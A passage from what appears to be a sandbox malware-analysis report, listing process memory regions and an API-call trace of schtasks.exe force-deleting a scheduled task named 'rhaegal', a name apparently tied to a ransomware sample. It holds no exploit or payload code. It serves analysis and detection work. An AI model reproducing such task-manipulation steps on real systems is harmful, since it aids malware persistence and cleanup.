513 start_va = 0x1f60000 end_va = 0x1f9ffff entry_point = 0x0 region_type = private name = "private_0x0000000001f60000" filename = "" Region: id = 514 start_va = 0x7efd8000 end_va = 0x7efdafff entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 515 start_va = 0x74410000 end_va = 0x7448ffff entry_point = 0x744237c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 516 start_va = 0x1fa0000 end_va = 0x20bffff entry_point = 0x0 region_type = private name = "private_0x0000000001fa0000" filename = "" Region: id = 517 start_va = 0x1fa0000 end_va = 0x207efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001fa0000" filename = "" Region: id = 518 start_va = 0x2080000 end_va = 0x20bffff entry_point = 0x0 region_type = private name = "private_0x0000000002080000" filename = "" Region: id = 519 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 520 start_va = 0x761f0000 end_va = 0x76272fff entry_point = 0x761f0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 521 start_va = 0x110000 end_va = 0x110fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000110000" filename = "" Region: id = 522 start_va = 0x746e0000 end_va = 0x7475cfff entry_point = 0x746e0000 region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\SysWOW64\\taskschd.dll" (normalized: "c:\\windows\\syswow64\\taskschd.dll") Region: id = 523 start_va = 0x20c0000 end_va = 0x217ffff entry_point = 0x20c0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Thread: id = 5 os_tid = 0x98c [0015.501] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x31fb5c | out: lpSystemTimeAsFileTime=0x31fb5c*(dwLowDateTime=0x429ca5f0, dwHighDateTime=0x1d34da4)) [0015.501] GetCurrentProcessId () returned 0x988 [0015.501] GetCurrentThreadId () returned 0x98c [0015.501] GetTickCount () returned 0x139d4 [0015.501] RtlQueryPerformanceCounter () returned 0x1 [0015.507] GetModuleHandleA (lpModuleName=0x0) returned 0x250000 [0015.507] __set_app_type (_Type=0x1) [0015.507] __p__fmode () returned 0x76ae31f4 [0015.507] __p__commode () returned 0x76ae31fc [0015.508] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x267881) returned 0x0 [0015.508] __wgetmainargs (in: _Argc=0x279e6c, _Argv=0x279e74, _Env=0x279e70, _DoWildCard=0, _StartInfo=0x279e80 | out: _Argc=0x279e6c, _Argv=0x279e74, _Env=0x279e70) returned 0 [0015.508] _onexit (_Func=0x270fe2) returned 0x270fe2 [0015.508] _onexit (_Func=0x270ff3) returned 0x270ff3 [0015.508] _onexit (_Func=0x271002) returned 0x271002 [0015.508] _onexit (_Func=0x27101e) returned 0x27101e [0015.508] _onexit (_Func=0x27103a) returned 0x27103a [0015.508] _onexit (_Func=0x271056) returned 0x271056 [0015.509] _onexit (_Func=0x271072) returned 0x271072 [0015.509] _onexit (_Func=0x27108e) returned 0x27108e [0015.509] _onexit (_Func=0x2710aa) returned 0x2710aa [0015.509] _onexit (_Func=0x2710c6) returned 0x2710c6 [0015.509] _onexit (_Func=0x2710e2) returned 0x2710e2 [0015.509] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0015.509] WinSqmIsOptedIn () returned 0x0 [0015.509] SetLastError (dwErrCode=0x0) [0015.509] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x18 [0015.509] VerSetConditionMask (ConditionMask=0x18, TypeMask=0x80000000, Condition=0x1) returned 0x1b [0015.509] VerSetConditionMask (ConditionMask=0x1b, TypeMask=0x80000000, Condition=0x20) returned 0x1801b [0015.509] VerifyVersionInfoW (in: lpVersionInformation=0x31f5d4, dwTypeMask=0x3, dwlConditionMask=0x1801b | out: lpVersionInformation=0x31f5d4) returned 1 [0015.509] lstrlenW (lpString="") returned 0 [0015.510] SetThreadUILanguage (LangId=0x0) returned 0x409 [0015.510] SetLastError (dwErrCode=0x0) [0015.510] _memicmp (_Buf1=0x384b68, _Buf2=0x251ed8, _Size=0x7) returned 0 [0015.510] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3859a8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\schtasks.exe" (normalized: "c:\\windows\\syswow64\\schtasks.exe")) returned 0x20 [0015.510] LoadLibraryExA (lpLibFileName="VERSION.dll", hFile=0x0, dwFlags=0x0) returned 0x74800000 [0015.520] GetProcAddress (hModule=0x74800000, lpProcName="GetFileVersionInfoSizeW") returned 0x748019d9 [0015.520] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", lpdwHandle=0x0 | out: lpdwHandle=0x0) returned 0x744 [0015.520] GetProcAddress (hModule=0x74800000, lpProcName="GetFileVersionInfoW") returned 0x748019f4 [0015.520] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", dwHandle=0x0, dwLen=0x74e, lpData=0x385bb8 | out: lpData=0x385bb8) returned 1 [0015.520] GetProcAddress (hModule=0x74800000, lpProcName="VerQueryValueW") returned 0x74801b51 [0015.520] VerQueryValueW (in: pBlock=0x385bb8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x31f6dc, puLen=0x31f6e0 | out: lplpBuffer=0x31f6dc*=0x385f54, puLen=0x31f6e0) returned 1 [0015.522] _memicmp (_Buf1=0x384b68, _Buf2=0x251ed8, _Size=0x7) returned 0 [0015.522] _vsnwprintf (in: _Buffer=0x3859a8, _BufferCount=0x3f, _Format="\\StringFileInfo\\%04x%04x\\InternalName", _ArgList=0x31f6c4 | out: _Buffer="\\StringFileInfo\\040904b0\\InternalName") returned 37 [0015.522] VerQueryValueW (in: pBlock=0x385bb8, lpSubBlock="\\StringFileInfo\\040904b0\\InternalName", lplpBuffer=0x31f6ec, puLen=0x31f6e8 | out: lplpBuffer=0x31f6ec*=0x385d80, puLen=0x31f6e8) returned 1 [0015.522] lstrlenW (lpString="schtasks.exe") returned 12 [0015.522] lstrlenW (lpString="schtasks.exe") returned 12 [0015.522] lstrlenW (lpString=".EXE") returned 4 [0015.522] StrStrIW (lpFirst="schtasks.exe", lpSrch=".EXE") returned=".exe" [0015.523] lstrlenW (lpString="schtasks.exe") returned 12 [0015.523] lstrlenW (lpString=".EXE") returned 4 [0015.523] _memicmp (_Buf1=0x384b68, _Buf2=0x251ed8, _Size=0x7) returned 0 [0015.523] lstrlenW (lpString="schtasks") returned 8 [0015.523] _memicmp (_Buf1=0x384bc8, _Buf2=0x251ed8, _Size=0x7) returned 0 [0015.523] _memicmp (_Buf1=0x384be0, _Buf2=0x251ed8, _Size=0x7) returned 0 [0015.523] LoadStringW (in: hInstance=0x0, uID=0x15ed, lpBuffer=0x386640, cchBufferMax=256 | out: lpBuffer="Type \"%s /?\" for usage.") returned 0x17 [0015.523] lstrlenW (lpString="Type \"%s /?\" for usage.") returned 23 [0015.523] _vsnwprintf (in: _Buffer=0x386598, _BufferCount=0x4f, _Format="Type \"%s /?\" for usage.", _ArgList=0x31f6c8 | out: _Buffer="Type \"SCHTASKS /?\" for usage.") returned 29 [0015.523] SetLastError (dwErrCode=0x0) [0015.523] GetThreadLocale () returned 0x409 [0015.523] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0015.523] lstrlenW (lpString="?") returned 1 [0015.523] GetThreadLocale () returned 0x409 [0015.523] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0015.523] lstrlenW (lpString="create") returned 6 [0015.523] GetThreadLocale () returned 0x409 [0015.523] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0015.523] lstrlenW (lpString="delete") returned 6 [0015.524] GetThreadLocale () returned 0x409 [0015.524] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0015.524] lstrlenW (lpString="query") returned 5 [0015.524] GetThreadLocale () returned 0x409 [0015.524] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0015.524] lstrlenW (lpString="change") returned 6 [0015.524] GetThreadLocale () returned 0x409 [0015.524] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0015.524] lstrlenW (lpString="run") returned 3 [0015.524] GetThreadLocale () returned 0x409 [0015.524] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0015.524] lstrlenW (lpString="end") returned 3 [0015.524] GetThreadLocale () returned 0x409 [0015.524] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0015.524] lstrlenW (lpString="showsid") returned 7 [0015.524] GetThreadLocale () returned 0x409 [0015.524] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0015.524] SetLastError (dwErrCode=0x0) [0015.524] SetLastError (dwErrCode=0x0) [0015.524] lstrlenW (lpString="/Delete") returned 7 [0015.524] lstrlenW (lpString="-/") returned 2 [0015.524] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0015.524] lstrlenW (lpString="?") returned 1 [0015.524] lstrlenW (lpString="?") returned 1 [0015.524] _memicmp (_Buf1=0x384bf8, _Buf2=0x251ed8, _Size=0x7) returned 0 [0015.524] lstrlenW (lpString="Delete") returned 6 [0015.524] _memicmp (_Buf1=0x384c28, _Buf2=0x251ed8, _Size=0x7) returned 0 [0015.524] _vsnwprintf (in: _Buffer=0x384c10, _BufferCount=0x4, _Format="|%s|", _ArgList=0x31f6b0 | out: _Buffer="|?|") returned 3 [0015.524] _vsnwprintf (in: _Buffer=0x385240, _BufferCount=0x9, _Format="|%s|", _ArgList=0x31f6b0 | out: _Buffer="|Delete|") returned 8 [0015.524] lstrlenW (lpString="|?|") returned 3 [0015.524] lstrlenW (lpString="|Delete|") returned 8 [0015.524] SetLastError (dwErrCode=0x490) [0015.524] lstrlenW (lpString="create") returned 6 [0015.524] lstrlenW (lpString="create") returned 6 [0015.524] _memicmp (_Buf1=0x384bf8, _Buf2=0x251ed8, _Size=0x7) returned 0 [0015.524] lstrlenW (lpString="Delete") returned 6 [0015.524] _memicmp (_Buf1=0x384c28, _Buf2=0x251ed8, _Size=0x7) returned 0 [0015.524] _vsnwprintf (in: _Buffer=0x385260, _BufferCount=0x9, _Format="|%s|", _ArgList=0x31f6b0 | out: _Buffer="|create|") returned 8 [0015.524] _vsnwprintf (in: _Buffer=0x385240, _BufferCount=0x9, _Format="|%s|", _ArgList=0x31f6b0 | out: _Buffer="|Delete|") returned 8 [0015.524] lstrlenW (lpString="|create|") returned 8 [0015.524] lstrlenW (lpString="|Delete|") returned 8 [0015.524] StrStrIW (lpFirst="|create|", lpSrch="|Delete|") returned 0x0 [0015.524] SetLastError (dwErrCode=0x490) [0015.524] lstrlenW (lpString="delete") returned 6 [0015.524] lstrlenW (lpString="delete") returned 6 [0015.525] _memicmp (_Buf1=0x384bf8, _Buf2=0x251ed8, _Size=0x7) returned 0 [0015.525] lstrlenW (lpString="Delete") returned 6 [0015.525] _memicmp (_Buf1=0x384c28, _Buf2=0x251ed8, _Size=0x7) returned 0 [0015.525] _vsnwprintf (in: _Buffer=0x385260, _BufferCount=0x9, _Format="|%s|", _ArgList=0x31f6b0 | out: _Buffer="|delete|") returned 8 [0015.525] _vsnwprintf (in: _Buffer=0x385240, _BufferCount=0x9, _Format="|%s|", _ArgList=0x31f6b0 | out: _Buffer="|Delete|") returned 8 [0015.525] lstrlenW (lpString="|delete|") returned 8 [0015.525] lstrlenW (lpString="|Delete|") returned 8 [0015.525] StrStrIW (lpFirst="|delete|", lpSrch="|Delete|") returned="|delete|" [0015.525] SetLastError (dwErrCode=0x0) [0015.525] SetLastError (dwErrCode=0x0) [0015.525] SetLastError (dwErrCode=0x0) [0015.525] lstrlenW (lpString="/F") returned 2 [0015.525] lstrlenW (lpString="-/") returned 2 [0015.525] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0015.525] lstrlenW (lpString="?") returned 1 [0015.525] lstrlenW (lpString="?") returned 1 [0015.525] _memicmp (_Buf1=0x384bf8, _Buf2=0x251ed8, _Size=0x7) returned 0 [0015.525] lstrlenW (lpString="F") returned 1 [0015.525] _memicmp (_Buf1=0x384c28, _Buf2=0x251ed8, _Size=0x7) returned 0 [0015.525] _vsnwprintf (in: _Buffer=0x385260, _BufferCount=0x4, _Format="|%s|", _ArgList=0x31f6b0 | out: _Buffer="|?|") returned 3 [0015.525] _vsnwprintf (in: _Buffer=0x385240, _BufferCount=0x4, _Format="|%s|", _ArgList=0x31f6b0 | out: _Buffer="|F|") returned 3 [0015.525] lstrlenW (lpString="|?|") returned 3 [0015.525] lstrlenW (lpString="|F|") returned 3 [0015.525] StrStrIW (lpFirst="|?|", lpSrch="|F|") returned 0x0 [0015.525] SetLastError (dwErrCode=0x490) [0015.525] lstrlenW (lpString="create") returned 6 [0015.525] lstrlenW (lpString="create") returned 6 [0015.525] _memicmp (_Buf1=0x384bf8, _Buf2=0x251ed8, _Size=0x7) returned 0 [0015.525] lstrlenW (lpString="F") returned 1 [0015.525] _memicmp (_Buf1=0x384c28, _Buf2=0x251ed8, _Size=0x7) returned 0 [0015.525] _vsnwprintf (in: _Buffer=0x385260, _BufferCount=0x9, _Format="|%s|", _ArgList=0x31f6b0 | out: _Buffer="|create|") returned 8 [0015.525] _vsnwprintf (in: _Buffer=0x385240, _BufferCount=0x4, _Format="|%s|", _ArgList=0x31f6b0 | out: _Buffer="|F|") returned 3 [0015.525] lstrlenW (lpString="|create|") returned 8 [0015.525] lstrlenW (lpString="|F|") returned 3 [0015.525] StrStrIW (lpFirst="|create|", lpSrch="|F|") returned 0x0 [0015.525] SetLastError (dwErrCode=0x490) [0015.525] lstrlenW (lpString="delete") returned 6 [0015.525] lstrlenW (lpString="delete") returned 6 [0015.525] _memicmp (_Buf1=0x384bf8, _Buf2=0x251ed8, _Size=0x7) returned 0 [0015.525] lstrlenW (lpString="F") returned 1 [0015.525] _memicmp (_Buf1=0x384c28, _Buf2=0x251ed8, _Size=0x7) returned 0 [0015.525] _vsnwprintf (in: _Buffer=0x385260, _BufferCount=0x9, _Format="|%s|", _ArgList=0x31f6b0 | out: _Buffer="|delete|") returned 8 [0015.525] _vsnwprintf (in: _Buffer=0x385240, _BufferCount=0x4, _Format="|%s|", _ArgList=0x31f6b0 | out: _Buffer="|F|") returned 3 [0015.525] lstrlenW (lpString="|delete|") returned 8 [0015.525] lstrlenW (lpString="|F|") returned 3 [0015.525] StrStrIW (lpFirst="|delete|", lpSrch="|F|") returned 0x0 [0015.525] SetLastError (dwErrCode=0x490) [0015.525] lstrlenW (lpString="query") returned 5 [0015.525] lstrlenW (lpString="query") returned 5 [0015.525] _memicmp (_Buf1=0x384bf8, _Buf2=0x251ed8, _Size=0x7) returned 0 [0015.525] lstrlenW (lpString="F") returned 1 [0015.525] _memicmp (_Buf1=0x384c28, _Buf2=0x251ed8, _Size=0x7) returned 0 [0015.526] _vsnwprintf (in: _Buffer=0x385260, _BufferCount=0x8, _Format="|%s|", _ArgList=0x31f6b0 | out: _Buffer="|query|") returned 7 [0015.526] _vsnwprintf (in: _Buffer=0x385240, _BufferCount=0x4, _Format="|%s|", _ArgList=0x31f6b0 | out: _Buffer="|F|") returned 3 [0015.526] lstrlenW (lpString="|query|") returned 7 [0015.526] lstrlenW (lpString="|F|") returned 3 [0015.526] StrStrIW (lpFirst="|query|", lpSrch="|F|") returned 0x0 [0015.526] SetLastError (dwErrCode=0x490) [0015.526] lstrlenW (lpString="change") returned 6 [0015.526] lstrlenW (lpString="change") returned 6 [0015.526] _memicmp (_Buf1=0x384bf8, _Buf2=0x251ed8, _Size=0x7) returned 0 [0015.526] lstrlenW (lpString="F") returned 1 [0015.526] _memicmp (_Buf1=0x384c28, _Buf2=0x251ed8, _Size=0x7) returned 0 [0015.526] _vsnwprintf (in: _Buffer=0x385260, _BufferCount=0x9, _Format="|%s|", _ArgList=0x31f6b0 | out: _Buffer="|change|") returned 8 [0015.526] _vsnwprintf (in: _Buffer=0x385240, _BufferCount=0x4, _Format="|%s|", _ArgList=0x31f6b0 | out: _Buffer="|F|") returned 3 [0015.526] lstrlenW (lpString="|change|") returned 8 [0015.526] lstrlenW (lpString="|F|") returned 3 [0015.526] StrStrIW (lpFirst="|change|", lpSrch="|F|") returned 0x0 [0015.526] SetLastError (dwErrCode=0x490) [0015.526] lstrlenW (lpString="run") returned 3 [0015.526] lstrlenW (lpString="run") returned 3 [0015.526] _memicmp (_Buf1=0x384bf8, _Buf2=0x251ed8, _Size=0x7) returned 0 [0015.526] lstrlenW (lpString="F") returned 1 [0015.526] _memicmp (_Buf1=0x384c28, _Buf2=0x251ed8, _Size=0x7) returned 0 [0015.526] _vsnwprintf (in: _Buffer=0x385260, _BufferCount=0x6, _Format="|%s|", _ArgList=0x31f6b0 | out: _Buffer="|run|") returned 5 [0015.526] _vsnwprintf (in: _Buffer=0x385240, _BufferCount=0x4, _Format="|%s|", _ArgList=0x31f6b0 | out: _Buffer="|F|") returned 3 [0015.526] lstrlenW (lpString="|run|") returned 5 [0015.526] lstrlenW (lpString="|F|") returned 3 [0015.526] StrStrIW (lpFirst="|run|", lpSrch="|F|") returned 0x0 [0015.526] SetLastError (dwErrCode=0x490) [0015.526] lstrlenW (lpString="end") returned 3 [0015.526] lstrlenW (lpString="end") returned 3 [0015.526] _memicmp (_Buf1=0x384bf8, _Buf2=0x251ed8, _Size=0x7) returned 0 [0015.526] lstrlenW (lpString="F") returned 1 [0015.526] _memicmp (_Buf1=0x384c28, _Buf2=0x251ed8, _Size=0x7) returned 0 [0015.526] _vsnwprintf (in: _Buffer=0x385260, _BufferCount=0x6, _Format="|%s|", _ArgList=0x31f6b0 | out: _Buffer="|end|") returned 5 [0015.526] _vsnwprintf (in: _Buffer=0x385240, _BufferCount=0x4, _Format="|%s|", _ArgList=0x31f6b0 | out: _Buffer="|F|") returned 3 [0015.526] lstrlenW (lpString="|end|") returned 5 [0015.526] lstrlenW (lpString="|F|") returned 3 [0015.526] StrStrIW (lpFirst="|end|", lpSrch="|F|") returned 0x0 [0015.526] SetLastError (dwErrCode=0x490) [0015.526] lstrlenW (lpString="showsid") returned 7 [0015.526] lstrlenW (lpString="showsid") returned 7 [0015.526] _memicmp (_Buf1=0x384bf8, _Buf2=0x251ed8, _Size=0x7) returned 0 [0015.526] lstrlenW (lpString="F") returned 1 [0015.526] _memicmp (_Buf1=0x384c28, _Buf2=0x251ed8, _Size=0x7) returned 0 [0015.526] _vsnwprintf (in: _Buffer=0x385280, _BufferCount=0xa, _Format="|%s|", _ArgList=0x31f6b0 | out: _Buffer="|showsid|") returned 9 [0015.526] _vsnwprintf (in: _Buffer=0x385240, _BufferCount=0x4, _Format="|%s|", _ArgList=0x31f6b0 | out: _Buffer="|F|") returned 3 [0015.526] lstrlenW (lpString="|showsid|") returned 9 [0015.526] lstrlenW (lpString="|F|") returned 3 [0015.526] StrStrIW (lpFirst="|showsid|", lpSrch="|F|") returned 0x0 [0015.526] SetLastError (dwErrCode=0x490) [0015.527] SetLastError (dwErrCode=0x490) [0015.527] SetLastError (dwErrCode=0x0) [0015.527] lstrlenW (lpString="/F") returned 2 [0015.527] StrChrIW (lpStart="/F", wMatch=0x3a) returned 0x0 [0015.527] SetLastError (dwErrCode=0x490) [0015.527] SetLastError (dwErrCode=0x0) [0015.527] lstrlenW (lpString="/F") returned 2 [0015.527] SetLastError (dwErrCode=0x0) [0015.527] SetLastError (dwErrCode=0x0) [0015.527] lstrlenW (lpString="/TN") returned 3 [0015.527] lstrlenW (lpString="-/") returned 2 [0015.527] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0015.527] lstrlenW (lpString="?") returned 1 [0015.527] lstrlenW (lpString="?") returned 1 [0015.527] _memicmp (_Buf1=0x384bf8, _Buf2=0x251ed8, _Size=0x7) returned 0 [0015.527] lstrlenW (lpString="TN") returned 2 [0015.527] _memicmp (_Buf1=0x384c28, _Buf2=0x251ed8, _Size=0x7) returned 0 [0015.527] _vsnwprintf (in: _Buffer=0x385280, _BufferCount=0x4, _Format="|%s|", _ArgList=0x31f6b0 | out: _Buffer="|?|") returned 3 [0015.527] _vsnwprintf (in: _Buffer=0x385240, _BufferCount=0x5, _Format="|%s|", _ArgList=0x31f6b0 | out: _Buffer="|TN|") returned 4 [0015.527] lstrlenW (lpString="|?|") returned 3 [0015.527] lstrlenW (lpString="|TN|") returned 4 [0015.527] SetLastError (dwErrCode=0x490) [0015.527] lstrlenW (lpString="create") returned 6 [0015.527] lstrlenW (lpString="create") returned 6 [0015.527] _memicmp (_Buf1=0x384bf8, _Buf2=0x251ed8, _Size=0x7) returned 0 [0015.527] lstrlenW (lpString="TN") returned 2 [0015.527] _memicmp (_Buf1=0x384c28, _Buf2=0x251ed8, _Size=0x7) returned 0 [0015.527] _vsnwprintf (in: _Buffer=0x385280, _BufferCount=0x9, _Format="|%s|", _ArgList=0x31f6b0 | out: _Buffer="|create|") returned 8 [0015.527] _vsnwprintf (in: _Buffer=0x385240, _BufferCount=0x5, _Format="|%s|", _ArgList=0x31f6b0 | out: _Buffer="|TN|") returned 4 [0015.527] lstrlenW (lpString="|create|") returned 8 [0015.527] lstrlenW (lpString="|TN|") returned 4 [0015.527] StrStrIW (lpFirst="|create|", lpSrch="|TN|") returned 0x0 [0015.527] SetLastError (dwErrCode=0x490) [0015.527] lstrlenW (lpString="delete") returned 6 [0015.527] lstrlenW (lpString="delete") returned 6 [0015.527] _memicmp (_Buf1=0x384bf8, _Buf2=0x251ed8, _Size=0x7) returned 0 [0015.527] lstrlenW (lpString="TN") returned 2 [0015.527] _memicmp (_Buf1=0x384c28, _Buf2=0x251ed8, _Size=0x7) returned 0 [0015.527] _vsnwprintf (in: _Buffer=0x385280, _BufferCount=0x9, _Format="|%s|", _ArgList=0x31f6b0 | out: _Buffer="|delete|") returned 8 [0015.527] _vsnwprintf (in: _Buffer=0x385240, _BufferCount=0x5, _Format="|%s|", _ArgList=0x31f6b0 | out: _Buffer="|TN|") returned 4 [0015.527] lstrlenW (lpString="|delete|") returned 8 [0015.527] lstrlenW (lpString="|TN|") returned 4 [0015.527] StrStrIW (lpFirst="|delete|", lpSrch="|TN|") returned 0x0 [0015.527] SetLastError (dwErrCode=0x490) [0015.527] lstrlenW (lpString="query") returned 5 [0015.527] lstrlenW (lpString="query") returned 5 [0015.527] _memicmp (_Buf1=0x384bf8, _Buf2=0x251ed8, _Size=0x7) returned 0 [0015.527] lstrlenW (lpString="TN") returned 2 [0015.527] _memicmp (_Buf1=0x384c28, _Buf2=0x251ed8, _Size=0x7) returned 0 [0015.527] _vsnwprintf (in: _Buffer=0x385280, _BufferCount=0x8, _Format="|%s|", _ArgList=0x31f6b0 | out: _Buffer="|query|") returned 7 [0015.527] _vsnwprintf (in: _Buffer=0x385240, _BufferCount=0x5, _Format="|%s|", _ArgList=0x31f6b0 | out: _Buffer="|TN|") returned 4 [0015.528] lstrlenW (lpString="|query|") returned 7 [0015.528] lstrlenW (lpString="|TN|") returned 4 [0015.528] StrStrIW (lpFirst="|query|", lpSrch="|TN|") returned 0x0 [0015.528] SetLastError (dwErrCode=0x490) [0015.528] lstrlenW (lpString="change") returned 6 [0015.528] lstrlenW (lpString="change") returned 6 [0015.528] _memicmp (_Buf1=0x384bf8, _Buf2=0x251ed8, _Size=0x7) returned 0 [0015.528] lstrlenW (lpString="TN") returned 2 [0015.528] _memicmp (_Buf1=0x384c28, _Buf2=0x251ed8, _Size=0x7) returned 0 [0015.528] _vsnwprintf (in: _Buffer=0x385280, _BufferCount=0x9, _Format="|%s|", _ArgList=0x31f6b0 | out: _Buffer="|change|") returned 8 [0015.528] _vsnwprintf (in: _Buffer=0x385240, _BufferCount=0x5, _Format="|%s|", _ArgList=0x31f6b0 | out: _Buffer="|TN|") returned 4 [0015.528] lstrlenW (lpString="|change|") returned 8 [0015.528] lstrlenW (lpString="|TN|") returned 4 [0015.528] StrStrIW (lpFirst="|change|", lpSrch="|TN|") returned 0x0 [0015.528] SetLastError (dwErrCode=0x490) [0015.528] lstrlenW (lpString="run") returned 3 [0015.528] lstrlenW (lpString="run") returned 3 [0015.528] _memicmp (_Buf1=0x384bf8, _Buf2=0x251ed8, _Size=0x7) returned 0 [0015.528] lstrlenW (lpString="TN") returned 2 [0015.528] _memicmp (_Buf1=0x384c28, _Buf2=0x251ed8, _Size=0x7) returned 0 [0015.528] _vsnwprintf (in: _Buffer=0x385280, _BufferCount=0x6, _Format="|%s|", _ArgList=0x31f6b0 | out: _Buffer="|run|") returned 5 [0015.528] _vsnwprintf (in: _Buffer=0x385240, _BufferCount=0x5, _Format="|%s|", _ArgList=0x31f6b0 | out: _Buffer="|TN|") returned 4 [0015.528] lstrlenW (lpString="|run|") returned 5 [0015.528] lstrlenW (lpString="|TN|") returned 4 [0015.528] StrStrIW (lpFirst="|run|", lpSrch="|TN|") returned 0x0 [0015.528] SetLastError (dwErrCode=0x490) [0015.528] lstrlenW (lpString="end") returned 3 [0015.528] lstrlenW (lpString="end") returned 3 [0015.528] _memicmp (_Buf1=0x384bf8, _Buf2=0x251ed8, _Size=0x7) returned 0 [0015.528] lstrlenW (lpString="TN") returned 2 [0015.528] _memicmp (_Buf1=0x384c28, _Buf2=0x251ed8, _Size=0x7) returned 0 [0015.528] _vsnwprintf (in: _Buffer=0x385280, _BufferCount=0x6, _Format="|%s|", _ArgList=0x31f6b0 | out: _Buffer="|end|") returned 5 [0015.528] _vsnwprintf (in: _Buffer=0x385240, _BufferCount=0x5, _Format="|%s|", _ArgList=0x31f6b0 | out: _Buffer="|TN|") returned 4 [0015.528] lstrlenW (lpString="|end|") returned 5 [0015.528] lstrlenW (lpString="|TN|") returned 4 [0015.528] StrStrIW (lpFirst="|end|", lpSrch="|TN|") returned 0x0 [0015.528] SetLastError (dwErrCode=0x490) [0015.528] lstrlenW (lpString="showsid") returned 7 [0015.528] lstrlenW (lpString="showsid") returned 7 [0015.528] _memicmp (_Buf1=0x384bf8, _Buf2=0x251ed8, _Size=0x7) returned 0 [0015.528] lstrlenW (lpString="TN") returned 2 [0015.528] _memicmp (_Buf1=0x384c28, _Buf2=0x251ed8, _Size=0x7) returned 0 [0015.528] _vsnwprintf (in: _Buffer=0x385280, _BufferCount=0xa, _Format="|%s|", _ArgList=0x31f6b0 | out: _Buffer="|showsid|") returned 9 [0015.528] _vsnwprintf (in: _Buffer=0x385240, _BufferCount=0x5, _Format="|%s|", _ArgList=0x31f6b0 | out: _Buffer="|TN|") returned 4 [0015.528] lstrlenW (lpString="|showsid|") returned 9 [0015.528] lstrlenW (lpString="|TN|") returned 4 [0015.528] StrStrIW (lpFirst="|showsid|", lpSrch="|TN|") returned 0x0 [0015.528] SetLastError (dwErrCode=0x490) [0015.528] SetLastError (dwErrCode=0x490) [0015.528] SetLastError (dwErrCode=0x0) [0015.528] lstrlenW (lpString="/TN") returned 3 [0015.528] StrChrIW (lpStart="/TN", wMatch=0x3a) returned 0x0 [0015.528] SetLastError (dwErrCode=0x490) [0015.528] SetLastError (dwErrCode=0x0) [0015.529] lstrlenW (lpString="/TN") returned 3 [0015.529] SetLastError (dwErrCode=0x0) [0015.529] SetLastError (dwErrCode=0x0) [0015.529] lstrlenW (lpString="rhaegal") returned 7 [0015.529] lstrlenW (lpString="-/") returned 2 [0015.529] StrChrIW (lpStart="-/", wMatch=0x72) returned 0x0 [0015.529] SetLastError (dwErrCode=0x490) [0015.529] SetLastError (dwErrCode=0x490) [0015.529] SetLastError (dwErrCode=0x0) [0015.529] lstrlenW (lpString="rhaegal") returned 7 [0015.529] StrChrIW (lpStart="rhaegal", wMatch=0x3a) returned 0x0 [0015.529] SetLastError (dwErrCode=0x490) [0015.529] SetLastError (dwErrCode=0x0) [0015.529] lstrlenW (lpString="rhaegal") returned 7 [0015.529] SetLastError (dwErrCode=0x0) [0015.530] SetLastError (dwErrCode=0x0) [0015.530] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x18 [0015.530] VerSetConditionMask (ConditionMask=0x18, TypeMask=0x80000000, Condition=0x1) returned 0x1b [0015.530] VerSetConditionMask (ConditionMask=0x1b, TypeMask=0x80000000, Condition=0x20) returned 0x1801b [0015.530] VerifyVersionInfoW (in: lpVersionInformation=0x31f4ec, dwTypeMask=0x3, dwlConditionMask=0x1801b | out: lpVersionInformation=0x31f4ec) returned 1 [0015.530] SetLastError (dwErrCode=0x0) [0015.530] lstrlenW (lpString="delete") returned 6 [0015.530] StrChrIW (lpStart="delete", wMatch=0x7c) returned 0x0 [0015.530] 